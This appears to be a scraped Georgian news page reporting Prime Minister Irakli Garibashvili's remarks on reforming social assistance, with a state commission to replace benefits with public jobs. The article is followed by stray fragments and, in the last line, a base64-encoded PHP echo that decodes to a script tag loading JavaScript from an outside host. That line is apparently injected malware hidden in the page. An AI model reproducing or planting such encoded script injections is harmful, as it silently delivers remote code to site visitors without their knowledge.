celsiusi
ავერსი შნაიდერი

"სოციალური პოლიტიკის ფარგლებში ზრდასრული, შრომისუნარიანი მოსახლეობა შევაჩვიეთ უმუშევრობას, სიღარიბეს და უმოქმედობას", - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა მთავრობის სხდომის დაწყებისას განაცხადა.  

 
მისი თქმით, არსებული სოციალური პოლიტიკა გვაჩვენებს, რომ მიმდინარე დინამიკა და ტენდენციები არის შემაშფოთებელი.
 
„რეალურად, არსებული სოციალური პოლიტიკის ფარგლებში ზრდასრული, შრომისუნარიანი მოსახლეობა შევაჩვიეთ უმუშევრობას, სიღარიბეს და უმოქმედობას. დღეს, შრომისუნარიანი, სოციალურად დაუცველი მოქალაქე არ არის მოტივირებული დაიწყოს მუშაობა იმიტომ, რომ სახელმწიფომ არ მოუხსნას სოციალური დახმარება. ეს არის კატასტროფა და ეს არის შემაშფოთებელი. ჩვენ, ხელისუფლებამ უნდა გადავდგათ გაბედული და ქმედითი ნაბიჯები“, - განაცხადა ირაკლი ღარიბაშვილმა.  მისივე თქმით, შეიქმნება სახელმწიფო კომისია, რომელიც აღნიშნულ საკითხზე მიდგომას შეიმუშავებს და მას ვიცე-პრემიერი, გარემოს დაცვის მინისტრი ლევან დავითაშვილი უხელმძღვანელებს.  „რამდენიმე კვირაში წარმოვადგენთ ხედვას, რომელიც არსებულ მიდგომას შეცვლის. ეს არის მანკიერი სისტემა, რომელიც უნდა შეიცვალოს გაჯანსაღებული, ახალი სისტემით. უნდა შევქმნათ სამუშაო ადგილები და ნაცვლად სოციალური დახმარებისა, ჩვენს მოქალაქეებს უნდა შევთავაზოთ სამუშაო ადგილები. ასეთი ათასობით საზოგადოებრივი სამუშაო ადგილები შეგვიძლია შევქმნათ", - განაცხადა ღარიბაშვილმა.  მისივე თქმით, საქართველოში დაინერგება სისტემა, რომელიც ევროპის ქვეყნებში არის გამოცდილი.
1041
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");